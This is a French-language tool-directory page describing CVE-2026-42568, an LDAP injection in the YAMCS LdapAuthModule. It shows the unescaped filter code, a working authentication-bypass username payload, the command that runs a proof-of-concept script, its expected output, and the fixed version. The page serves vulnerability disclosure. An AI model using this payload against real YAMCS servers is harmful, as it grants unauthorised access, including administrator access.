Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-42568 — Une vulnérabilité d'injection LDAP existe dans org.yamcs.security.LdapAuthModule. Le paramètre username est inséré directement dans les filtres de recherche LDAP sans échappement RFC 4515, permettant un contournement de l'authentification. | Kitploit
Outils/GitHubGitHub/ex-cal1bur/cve-2026-42568
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et Éducation
GitHubex-cal1bur/cve-2026-42568

CVE-2026-42568

Une vulnérabilité d'injection LDAP existe dans org.yamcs.security.LdapAuthModule. Le paramètre username est inséré directement dans les filtres de recherche LDAP sans échappement RFC 4515, permettant un contournement de l'authentification.

Voir le dépôt
1il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-42568 — Injection LDAP dans LdapAuthModule

Résumé

Une vulnérabilité d'injection LDAP existe dans org.yamcs.security.LdapAuthModule. Le paramètre username est inséré directement dans les filtres de recherche LDAP sans échappement RFC 4515, permettant un contournement de l'authentification.

ChampValeur
CVECVE-2026-42568
GravitéMEDIUM
CWECWE-90 : Neutralisation incorrecte des éléments spéciaux dans une requête LDAP
Affectéyamcs-core < 5.12.7 (avec authentification LDAP configurée)
Corrigé dansyamcs-core 5.12.7
AvisGHSA-cqh3-jg8p-336j

Détails de la vulnérabilité

Cause racine (LdapAuthModule.java) :

root@kitploit:~
var filter = userFilter.replace("{0}", username);
// username inséré directement — pas d'échappement RFC 4515

Avec un userFilter typique de (uid={0}), un nom d'utilisateur malveillant brise la structure du filtre :

root@kitploit:~
Entrée :  *)(uid=*))(|(uid=*
Filtre : (uid=*)(uid=*))(|(uid=*)
Résultat : Correspondance universelle — authentification contournée

Preuve de concept

root@kitploit:~
pip install requests
python3 poc.py http://localhost:8090

Sortie attendue sur une instance vulnérable (avec LDAP configuré) :

root@kitploit:~
[1] Contournement universel (n'importe quel compte)
     Nom d'utilisateur : *)(uid=*))(|(uid=*
     Mot de passe : n'importe quoi
     Résultat :   HTTP 200
     [!!!] AUTHENTIFICATION CONTOURNÉE
     [!!!] Jeton reçu : eyJhbGciOiJSUzI1NiJ9...

Note : Cette vulnérabilité n'affecte que les instances YAMCS avec LdapAuthModule configuré. Les installations par défaut utilisant l'authentification intégrée ne sont pas concernées.

Impact

Un attaquant non authentifié capable d'atteindre le serveur YAMCS peut contourner complètement l'authentification lorsque l'authentification LDAP est configurée, obtenant un accès en tant qu'utilisateur arbitraire, y compris les administrateurs.

Correctif

Mettez à jour vers yamcs-core >= 5.12.7.

Le correctif applique l'échappement RFC 4515 au nom d'utilisateur avant de construire le filtre LDAP.

Chronologie

DateÉvénement
2026-05Vulnérabilité signalée
2026-05-26Correctif publié dans yamcs-core 5.12.7
2026-05-26Avis public publié

Chercheur

Daniel Miranda Barcelona (Excal1bur)

  • GitHub : https://github.com/ex-cal1bur
  • LinkedIn : https://linkedin.com/in/daniel-miranda-barcelona
  • Blog : https://thedumpster.es
Télécharger l’outil